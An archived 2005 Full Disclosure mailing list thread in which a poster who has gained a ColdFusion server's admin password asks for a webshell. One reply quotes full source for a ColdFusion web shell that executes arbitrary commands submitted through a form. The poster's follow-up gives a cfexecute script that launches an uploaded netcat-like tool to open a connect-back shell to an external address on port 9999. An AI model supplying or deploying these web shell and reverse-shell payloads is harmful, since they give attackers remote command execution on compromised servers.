Full Disclosure mailing list archives
Re: coldfusion pentest
From: "fatb" <fatb () security zz ha cn>
Date: Tue, 10 May 2005 17:12:00 +0800
thx :) the script from securiteam was from Kurt Grutzmacher originally,it could not run in my box and Im successful got a working shell by uploading a nc like tool and use the following script to run it <html> <body> <cfexecute name="D:\haha.exe" arguments="-connect 1.1.1. 9999" timeout="20"> </cfexecute> </body> </html> no matter how,I thought many guys who like me need a working cf webshell,because the upload script do not allow us to upload exe or some other kinds of files ----- Original Message ----- From: "Javier Reoyo" <javier.reoyo () interdominios com> To: <full-disclosure () lists grok org uk> Sent: Tuesday, May 10, 2005 4:31 PM Subject: Re: [Full-disclosure] coldfusion pentest
Hi fatb, this is from mailing of securiteam. Try it. ColdFusion Web Shell ------------------------------------------------------------------------ SUMMARY DETAILS The following source code will generate a web based shell whenever it is executed under the ColdFusion environment. Tool source code: < html> < body> < cfoutput> < table> < form method="POST" action="cfexec.cfm"> < tr> < td>Command:</td> < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td> </tr> < tr> < td>Options:</td> < td> < input type=text name="opts" size=50 < cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td> </tr> < tr> < td>Timeout:</td> < td>< input type=text name="timeout" size=4 < cfif isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5" </cfif> > </td> </tr> </table> < input type=submit value="Exec" > </FORM> < cfsavecontent variable="myVar"> < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> < pre> #myVar# </pre> </cfoutput> </body> </html> ADDITIONAL INFORMATION The information has been provided by <mailto:grutz () jingojango net> Kurt Grutzmacher. ======================================== ----- Original Message ----- From: "fatb" <fatb () security zz ha cn> To: <pen-test () securityfocus com> Cc: <full-disclosure () lists grok org uk> Sent: Tuesday, May 10, 2005 4:43 AM Subject: [Full-disclosure] coldfusion pentestHi all guys I've successed get the admin's passwd of the web interface and I can upload any kinds of files to the server the server is running coldfusion 4.5 with iis 5.0 but I can not find a coldfusion webshell to continue anybody could be kind enough to send me a working coldfusion webshell thx in advanced!---------------------------------------------------------------------------- ----_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- coldfusion pentest fatb (May 09)
- Re: coldfusion pentest Kurt Grutzmacher (May 09)
- Re: coldfusion pentest Frederic Charpentier (May 10)
- Re: coldfusion pentest Javier Reoyo (May 10)
- Re: coldfusion pentest fatb (May 10)
- Re: coldfusion pentest fatb (May 10)